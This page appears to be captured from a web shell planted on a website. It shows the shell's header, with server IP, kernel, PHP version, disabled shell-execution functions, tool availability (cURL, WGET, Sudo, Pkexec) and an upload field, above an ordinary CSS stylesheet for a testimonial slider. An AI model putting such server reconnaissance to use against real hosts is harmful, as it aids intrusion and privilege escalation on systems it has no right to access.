Server IP : 104.21.38.3 / Your IP : 162.158.88.157 Web Server : Apache System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64 User : www ( 1000) PHP Version : 7.4.33 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/rangeofmotion.in/testimonial-css/ |
Upload File : |
/* Google Fonts - Poppins */ @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap"); * { margin: 0; padding: 0; box-sizing: border-box; font-family: "Poppins", sans-serif; } .container { height: 130vh; width: 100%; display: flex; align-items: center; justify-content: center; background-color: #e3f2fd; } .testimonial { position: relative; max-width: 900px; width: 100%; padding: 50px 0; overflow: hidden; } .testimonial .image { height: 170px; width: 170px; object-fit: cover; border-radius: 50%; } .testimonial .slide { display: flex; align-items: center; justify-content: center; flex-direction: column; row-gap: 30px; height: 100%; width: 100%; } .slide p { text-align: center; padding: 0 60px; font-size: 14px; font-weight: 400; color: #333; } .slide .quote-icon { font-size: 30px; color: #4070f4; } .slide .details { display: flex; flex-direction: column; align-items: center; } .details .name { font-size: 14px; font-weight: 600; color: #333; } .details .job { font-size: 12px; font-weight: 400; color: #333; } /* swiper button css */ .nav-btn { height: 40px; width: 40px; border-radius: 50%; transform: translateY(30px); background-color: rgba(0, 0, 0, 0.1); transition: 0.2s; } .nav-btn:hover { background-color: rgba(0, 0, 0, 0.2); } .nav-btn::after, .nav-btn::before { font-size: 20px; color: #fff; } .swiper-pagination-bullet { background-color: rgba(0, 0, 0, 0.8); } .swiper-pagination-bullet-active { background-color: #4070f4; } @media screen and (max-width: 768px) { .slide p { padding: 0 20px; } .nav-btn { display: none; } .container { height: 120vh; width: 100%; display: flex; align-items: center; justify-content: center; background-color: #e3f2fd; /*margin: 200px 0px 200px 0px;*/ } } @media screen and (max-width: 414px) { .container { height: 150vh; width: 100%; display: flex; align-items: center; justify-content: center; background-color: #e3f2fd; /*margin: 200px 0px 200px 0px;*/ }}